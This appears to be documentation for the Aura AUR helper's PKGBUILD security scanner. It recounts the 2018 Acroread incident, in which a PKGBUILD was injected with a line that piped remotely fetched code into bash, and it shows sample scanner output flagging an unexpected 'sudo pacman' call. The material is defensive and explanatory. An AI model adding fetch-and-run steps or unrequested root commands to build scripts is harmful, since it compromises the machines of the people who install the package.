PKGBUILD Security Analysis

In 2018 July, the Acroread package was compromised. While the offending commit is no longer available, the mailing list mentions the cause: someone had injected a line into Acroread's PKGBUILD that curls down some custom code from the internet and pipes it into a new bash process. Many people discovered that they had been victim to this vulnerability, and it came without warning and left no obvious trace.

The top of the AUR page states:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

"Caveat emptor". And it is considered standard practice to always check PKGBUILDs before building a package. That said, people aren't perfect, and can miss details. Should they be punished for that with a system vulnerability? Aura's author doesn't think so.

Since 2018 August (Aura 2.0), Aura has had automatic bash vulnerability detection. After dependency checking, each PKGBUILD is parsed and scanned for malicious bash patterns. If one is detected, you'll see a message like this:

> sudo aura -A myget
aura >>= Determining dependencies...

aura >>= WARNING: The PKGBUILD of myget contains blacklisted bash expressions.

    sudo pacman -S aurvote

aura >>= sudo indicates that someone may be trying to gain root access to your machine.
aura >>= Do you wish to quit the build process? [Y/n]
aura >>= Cancelled further processing to avoid potentially malicious bash code.

Clearly a PKGBUILD should not be calling sudo pacman on its own. This is a clear violation of best practices. To be fair, the author of this PKGBUILD is probably not malicious, but the package must be fixed either way.

Aside from automatic detection, as of 2020 May (Aura 3.0) Aura also has the -P command which can be used to scan any PKGBUILD you give it.

💡 Note: The presence of automatic PKGBUILD scanning is not an excuse to be lazy! Please continue to check PKGBUILDs yourself!

Scanning a PKGBUILD from Stdin

Wondering about the safety of a particular package on the AUR? We don't have to try and build it - we can scan the PKGBUILD in isolation:

> aura -Ap myget | aura -P

    sudo pacman -S aurvote

aura >>= sudo indicates that someone may be trying to gain root access to your machine.
aura >>= Potential PKGBUILD vulnerabilities detected.

Recall that -Ap pulls a PKGBUILD from the AUR and prints it to the terminal.

Scanning a PKGBUILD File

-P is also intended as a tool for AUR package maintainers, to help them insure that they aren't unintentionally doing something dangerous or suspicious. Let's check Aura's own PKGBUILD...

> aura -Pf PKGBUILD
>

No error code! Phew...

Scanning a Directory

You can also indicate a directory that you know contains a file named PKGBUILD:

> aura -Pd aura/
>

Safe again.